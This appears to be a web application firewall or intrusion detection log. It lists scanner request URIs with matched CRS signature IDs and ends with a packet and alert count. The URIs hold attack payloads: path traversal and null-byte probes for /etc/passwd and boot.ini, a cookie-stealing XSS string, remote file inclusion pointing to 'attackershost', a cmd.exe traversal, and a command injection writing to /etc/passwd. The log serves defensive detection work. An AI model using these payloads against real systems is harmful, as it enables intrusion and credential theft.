Packet [3850]	Uri [/forum-ra.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3851]	Uri [/forum-ra.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3852]	Uri [/forum-ra.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3853]	Uri [/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3854]	Uri [/forum-ra.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3855]	Uri [/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3856]	Uri [/forum-ra_professionnel.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3857]	Uri [/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3858]	Uri [/forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3859]	Uri [/forum-ra_professionnel.asp?n=../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3860]	Uri [/forum-ra_professionnel.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3861]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3862]	Uri [/forum-ra_professionnel.asp?n=/../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3863]	Uri [/forum-ra_professionnel.asp?n=/../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3864]	Uri [/forum-ra_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3865]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3866]	Uri [/forum-ra_professionnel.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3867]	Uri [/forum-ra_professionnel.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3879]	Uri [/forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3881]	Uri [/forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3882]	Uri [/forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3883]	Uri [/forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3884]	Uri [/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3885]	Uri [/forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3886]	Uri [/forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3887]	Uri [/forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3888]	Uri [/forum1.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3889]	Uri [/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3890]	Uri [/forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3891]	Uri [/forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3892]	Uri [/forum1.asp?n=1753&amp;nn=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3894]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3895]	Uri [/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3896]	Uri [/forum1.asp?n=1753&amp;nn=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3897]	Uri [/forum1.asp?n=1753&amp;nn=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3898]	Uri [/forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3899]	Uri [/forum1.asp?n=1753&amp;nn=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3900]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3901]	Uri [/forum1.asp?n=1753&amp;nn=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3902]	Uri [/forum1.asp?n=1753&amp;nn=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3903]	Uri [/forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [3904]	Uri [/forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3906]	Uri [/forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3907]	Uri [/forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3908]	Uri [/forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3909]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3910]	Uri [/forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3911]	Uri [/forum1_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3912]	Uri [/forum1_professionnel.asp?n=/.\./.\./.\./.\./.\./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3913]	Uri [/forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3914]	Uri [/forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3915]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3916]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3918]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3919]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3920]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3921]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3922]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3923]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3924]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3925]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/.\./.\./.\./.\./.\./boot.ini&amp;page=1]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3926]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3927]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3928]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [3930]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3931]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3932]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3933]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3934]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [3935]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3936]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3937]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [3938]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [3939]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [3940]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3941]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [3942]	Uri [/forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1]	Nattacks [1 ]	Signatures	[930120]
Packet [3943]	Uri [/forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.]	Nattacks [1 ]	Signatures	[930120]
Packet [3966]	Uri [/homebet/homSensePostNotThereNoNo.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [3967]	Uri [/homebet/homebet.dll?form=menu&amp;option=menu-signin]	Nattacks [1 ]	Signatures	[920440]
Packet [4000]	Uri [//indSensePostNotThereNoNo.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [4001]	Uri [//indSensePostNotThereNoNo.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [4002]	Uri [/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20]	Nattacks [1 ]	Signatures	[941180]
Packet [4045]	Uri [/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd]	Nattacks [8 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932115]	[932160]	[942460]
Packet [4050]	Uri [/mantis/sumSensePostNotThereNoNo.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [4051]	Uri [/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F]	Nattacks [2 ]	Signatures	[931120]	[931130]
Packet [4063]	Uri [/modif_infos.asp?n=%60/etc/passwd%60]	Nattacks [5 ]	Signatures	[930120]	[932105]	[932160]	[942110]	[942260]
Packet [4065]	Uri [/modif_infos.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [4066]	Uri [/modif_infos.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [4067]	Uri [/modif_infos.asp?n=/....../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [4068]	Uri [/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini]	Nattacks [2 ]	Signatures	[930120]	[942460]
Packet [4069]	Uri [/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [4070]	Uri [/modif_infos.asp?n=/../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [4071]	Uri [/modif_infos.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
Packet [4072]	Uri [/modif_infos.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [4073]	Uri [/modif_infos.asp?n=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [4074]	Uri [/modif_infos.asp?n=/etc/passwd%00]	Nattacks [5 ]	Signatures	[920270]	[920271]	[920272]	[930120]	[932160]
Packet [4075]	Uri [/modif_infos.asp?n=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [4124]	Uri [/php/phpSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4125]	Uri [/php/php4ts.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4126]	Uri [/php/php4ts.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4135]	Uri [/productcart/database/EIPSensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [4136]	Uri [/productcart/database/EIPC.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [4152]	Uri [//pt_SensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [4153]	Uri [//pt_SensePostNotThereNoNo.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [4154]	Uri [/pt_config.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [4160]	Uri [/quikmail/nphSensePostNotThereNoNo.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [4161]	Uri [/quikmail/nph-emumail.cgi?type=../%00]	Nattacks [6 ]	Signatures	[920270]	[920271]	[920272]	[930110]	[930110]	[942460]
Packet [4166]	Uri [/scripts/traSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4167]	Uri [/scripts/tradecli.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4168]	Uri [/scripts/traSensePostNotThereNoNo.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [4169]	Uri [/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [4184]	Uri [/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [4185]	Uri [/Site/bizSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4186]	Uri [/Site/biztalkhttpreceive.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [4211]	Uri [/tmp_view.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [4234]	Uri [/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd]	Nattacks [5 ]	Signatures	[920272]	[921151]	[930120]	[932105]	[932160]
# N. packets [4272], [732] with alerts, N. Alerts [2020]
